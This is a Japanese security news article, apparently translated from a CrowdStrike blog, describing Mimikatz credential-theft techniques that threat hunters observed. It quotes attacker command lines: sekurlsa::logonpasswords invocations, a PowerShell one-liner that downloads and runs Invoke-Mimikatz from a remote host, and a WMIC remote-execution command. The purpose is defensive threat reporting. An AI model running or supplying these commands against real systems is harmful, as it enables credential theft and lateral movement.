CrowdStrike Blog:「サイバー界のAK47」、Mimikatzを利用したシグネチャベースの検知回避 | ScanNetSecurity[国内最大級のサイバーセキュリティ専門ポータルサイト]
2019.08.22(木)

CrowdStrike Blog:「サイバー界のAK47」、Mimikatzを利用したシグネチャベースの検知回避

今回は、オープンソースツールのMimikatzが攻撃者にどのように利用されているかについて、CrowdStrike Falcon OverWatchチームが確認した例をいくつかご紹介します。

国際 海外情報
 今回は、オープンソースツールのMimikatzが攻撃者にどのように利用されているかについて、CrowdStrike Falcon OverWatchチームが確認した例をいくつかご紹介します。中にはシグネチャベースの検知を回避するためにMimikatzが使われた珍しいケースもあります。

 OverWatchチームは、お客様のインフラストラクチャに対して試みられた攻撃を総合的に可視化しています。この可視化は多岐にわたるお客様の業種・規模を網羅しています。OverWatchチームは、Falconエンドポイントセキュリティプラットフォームが提供するシステムの可視化を用いて、悪意のあるアクティビティを広範囲に観測しています。

権限昇格に使用する認証情報へのアクセス

 悪意のあるアクティビティでよく見られるのが、認証情報へのアクセスです。多くの場合、攻撃者は権限を昇格してインフラストラクチャ内のアクセス可能な領域を広げるために、さまざまな手段を使って有効な認証情報を探します。OverWatchチームは、攻撃者が標的とした1人のユーザーに対して、認証情報を盗み取るために複数の手法を用いていたケースを確認しています(認証情報の窃取を狙った悪意のあるアクティビティで複数の手法が使用された例は、「2018年版 Falcon OverWatch Report」で紹介しています)。

Mimikatzの手法

 認証情報にアクセスする一般的な方法に、Mimikatzの使用が挙げられます。CrowdStrikeの共同創業者で最高技術責任者(CTO)のDmitri Alperovitchは、Mimikatzを「サイバー界のAK47」と呼んでいます。OverWatchチームは、標的型攻撃とペネトレーションテスト(侵入テスト)のいずれにおいてもMimikatzが使われていることを頻繁に観測しています。

実行ファイル名の変更

 Mimikatzを使用した最も単純で直接的な手法は、侵害したシステムにMimikatzをコピーし、実行ファイルの名前を変更し、以下のようなコマンドラインを使用して起動することです。

c:\ProgramData\p.exe ""privilege::debug""
""sekurlsa::logonpasswords""

 これにより攻撃者は、システム上の認証情報にアクセスできるようになります。

バッチファイルの使用

 Mimikatzを起動する別の方法でこれまでに確認されているものには、バッチファイルを使用して標的となるシステムにMimikatzをコピーし、それを起動してアウトプットをファイルに送信し、その出力ファイルを元の一元的な収集ポイントにコピーして、最後に標的となったシステムから関連ファイルをすべて削除する方法などがあります。

PowerShellの亜種を使用

 OverWatchのアナリストがこれまでに確認した認証情報にアクセスするためのその他の方法には、次のような、Mimikatz用に改変したPowerShellを使用した例があります。

powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswordsexit'

コマンドラインオプションの変更

 2018年第4四半期には、Mimikatzを使用した別の方法をOverWatchのアナリストが確認しています。具体的には、コマンドラインオプションを変更するように改変されたケースです。

mnl.exe pr::dg sl::lp et -p

 このMimikatzの特定の亜種は、以下に示すように、標的とした複数のシステムに対してWMIC.exeを使用して実行されます。

Wmic /NODE:"[REDACTED]" /USER:"[REDACTED]" /password:[REDACTED] process call create "cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >>
c:\windows\temp\temp.txt"

IOAの監視が必須

 これらの手法は明らかに実行ファイルのコマンドラインオプションを参照してその目的を推測したり、バイナリファイル内に関連する文字列が存在するかどうかを確認することだけに頼る脆弱な検知アプローチを回避することを狙ったものと言えます。攻撃者はさまざまな手法を使って認証情報にアクセスする可能性がありますが、Falconプラットフォームは、検知メカニズムを回避または妨害する目的で新しい手法が使用されている場合にも確認できる可視水準を提供します。

 ファイル名、ハッシュ、単一のコマンドラインオプションなどの典型的な攻撃の痕跡(IOC)に注目するだけでなく、攻撃者の行動にフォーカスした攻撃の痕跡(IOA)を監視することの重要性が、さらに明らかになっています。

その他のリソース

「2019 CrowdStrike Global Threat Report:Adversary Tradecraft and the Importance of Speed」をダウンロードしてご覧ください

「2018年版 CrowdStrike Falcon OverWatch Report 脅威ハンティングの最前線」をダウンロードしてご覧ください

・CrowdStrikeの次世代アンチウイルス(AV)を実際にお試しいただけます。今すぐFalcon Preventの無料トライアル版をお試しください


*原文はCrowdStrike Blog サイト掲載 :https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/

《Harlan Carvey (CrowdStrike)》

関連記事

PageTop

特集

アクセスランキング

  1. 不正アクセスでカード情報流出、安全のためサービス再開を断念(HARIO)

    不正アクセスでカード情報流出、安全のためサービス再開を断念(HARIO)

  2. 近畿地方整備局の保守業務事業者へ標的型メール攻撃、設備資料6件が流出可能性(国土交通省)

    近畿地方整備局の保守業務事業者へ標的型メール攻撃、設備資料6件が流出可能性(国土交通省)

  3. サイバー犯罪捜査官、採用選考受付8月1日から(大阪府警察)

    サイバー犯罪捜査官、採用選考受付8月1日から(大阪府警察)

  4. Apache HTTP Web Server 2.4系アップデート、複数の脆弱性に対応(JVN)

    Apache HTTP Web Server 2.4系アップデート、複数の脆弱性に対応(JVN)

  5. 3,411件患者個人情報流出、データ匿名化するも運用の繁雑さから形骸化(横浜市立大学)

    3,411件患者個人情報流出、データ匿名化するも運用の繁雑さから形骸化(横浜市立大学)

  6. 米裁判所が異例の常識的判断、Wannacry 仕留めた後 FBI に逮捕された英国人技術者を無罪放免(The Register)

    米裁判所が異例の常識的判断、Wannacry 仕留めた後 FBI に逮捕された英国人技術者を無罪放免(The Register)

  7. 6月末からメンテナンス中の「ECオーダー.com」カード情報流出の疑い(チャンピオンソフト、まどそふと、エウクレイア、葉月)

    6月末からメンテナンス中の「ECオーダー.com」カード情報流出の疑い(チャンピオンソフト、まどそふと、エウクレイア、葉月)

  8. 「BIG-IP」に重大な脆弱性、関連情報を紹介(エフセキュア)

    「BIG-IP」に重大な脆弱性、関連情報を紹介(エフセキュア)

  9. 毎年アンチウイルスを更新する「攻め」のセキュリティグループはなぜ、CrowdStrike の EDR を選定したか

    毎年アンチウイルスを更新する「攻め」のセキュリティグループはなぜ、CrowdStrike の EDR を選定したかPR

  10. マイクロソフトが月例セキュリティ情報を公開、10製品を更新(IPA、JPCERT/CC)

    マイクロソフトが月例セキュリティ情報を公開、10製品を更新(IPA、JPCERT/CC)

ランキングをもっと見る